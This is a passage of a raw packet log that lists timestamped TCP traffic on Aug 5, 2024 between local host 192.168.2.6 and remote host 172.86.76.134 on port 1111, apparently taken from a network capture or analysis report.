                              Aug 5, 2024 14:40:50.526622057 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.526648045 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.526671886 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.526674032 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.526699066 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.526715040 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.526736975 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.526743889 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.526762009 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.526787996 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.526809931 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.526818037 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.526843071 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.526869059 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.526890039 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.526894093 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.526915073 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.526918888 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.526940107 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.526962996 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.526964903 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.526990891 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.527015924 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.527035952 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.527040005 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.527066946 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.527070045 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.527111053 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.607254028 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.607321024 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.607351065 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.607403994 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.607409000 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.607439041 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.607465982 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.607470989 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.607510090 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.607522011 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.607546091 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.608285904 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.608340025 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.608342886 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.608382940 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.608557940 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.608589888 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.608623028 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.608659029 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.608670950 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.608709097 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.608724117 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.608777046 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.608813047 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.608846903 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.608860016 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.608879089 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.608906984 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.608913898 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.609003067 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.609016895 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.609564066 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.610358953 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.610431910 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.610435009 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.610467911 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.610496998 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.610523939 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.610558987 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.610577106 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.610599041 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.610692978 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.610742092 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.610743046 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.610775948 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.610786915 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.610807896 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.610842943 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.610878944 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.610891104 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.610932112 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.611085892 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.611120939 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.611152887 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.611162901 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.611191988 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.611226082 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.611258030 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.611273050 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.611291885 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.611325979 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.611341000 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.611382961 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.611598015 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.611630917 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.611664057 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.611686945 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.611701965 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.611740112 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.611843109 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.611866951 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.611876011 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.611900091 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.611908913 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.611941099 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.611951113 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.611973047 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612005949 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612037897 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612046957 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.612068892 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612087011 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.612103939 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612323999 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612355947 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612377882 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.612389088 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612415075 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.612426996 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612461090 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612472057 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.612513065 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612546921 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612591982 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.612593889 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612627029 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612637043 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.612658978 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612690926 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612724066 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612735987 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.612756968 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612771034 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.612790108 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612822056 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612853050 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612865925 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.612884998 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.612904072 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.612917900 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613219976 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613253117 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613274097 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.613286018 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613310099 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.613322973 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613357067 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613389969 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613399029 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.613421917 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613432884 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.613454103 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613490105 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613523960 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613533974 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.613559961 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613568068 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.613611937 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613641024 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613675117 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613692999 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.613709927 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613729954 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.613744020 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613780975 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613830090 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.613836050 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613872051 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613886118 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.613923073 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613956928 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.613993883 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.614005089 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.614031076 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.614037991 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.614065886 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.614099026 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.614131927 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.614155054 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.614167929 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.614187956 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.614217043 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.614384890 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.614417076 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.614439964 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.614449978 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.614473104 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.614485979 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.614522934 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.614553928 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.614562988 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.614588022 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.614597082 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.614624977 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.614660978 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.614692926 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.614705086 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.614726067 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.614742041 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.614759922 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.615128994 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.696090937 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.696136951 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.696157932 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.696167946 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.696185112 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.696260929 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.696278095 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.696288109 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.696316004 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.696342945 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.697097063 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.697149992 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.697184086 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.697195053 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.697241068 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.697273016 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.697283030 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.697292089 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.697302103 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.697326899 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.697365046 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.697557926 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.697628975 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.697638988 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.697674036 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.697741032 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.697753906 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.697765112 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.697787046 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.697822094 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.697850943 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.699069977 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.699161053 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.699337006 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.699347973 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.699394941 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.699394941 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.699405909 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.699417114 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.699459076 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.699608088 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.699618101 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.699625015 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.699635029 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.699644089 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.699651003 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.699656010 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.699678898 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.700022936 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700032949 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700042009 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700052023 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700062990 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700072050 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700073004 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.700083971 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700114012 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.700139046 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.700315952 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700325966 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700335979 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700346947 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700383902 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.700403929 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.700412989 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700424910 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700433969 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700445890 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700464964 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.700469971 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700488091 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.700499058 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700510025 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700520992 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700530052 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700544119 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.700548887 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700561047 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.700582027 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.701277018 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.701287031 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.701294899 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.701304913 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.701317072 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.701329947 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.701332092 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.701340914 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.701349974 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.701358080 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.701366901 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.701374054 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.701376915 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.701389074 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.701400995 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.701401949 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.701411009 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.701421022 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.701427937 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.701430082 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.701440096 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.701447964 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.701448917 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.701458931 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.701477051 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.701499939 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.702173948 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702186108 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702193975 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702203035 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702215910 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702224016 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.702224970 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702234983 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702244997 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702250004 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.702254057 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702264071 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702270031 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.702275038 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702299118 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.702759027 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702769041 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702778101 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702786922 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702796936 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702811003 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702821016 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702830076 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702830076 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.702841043 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702850103 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.702851057 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702860117 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702872992 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702882051 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.702883959 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702893019 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702903032 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702912092 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.702913046 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.702929974 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.702953100 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.703624010 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.703634977 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.703646898 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.703658104 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.703670025 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:50.703676939 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:50.703704119 CEST497211111192.168.2.6172.86.76.134
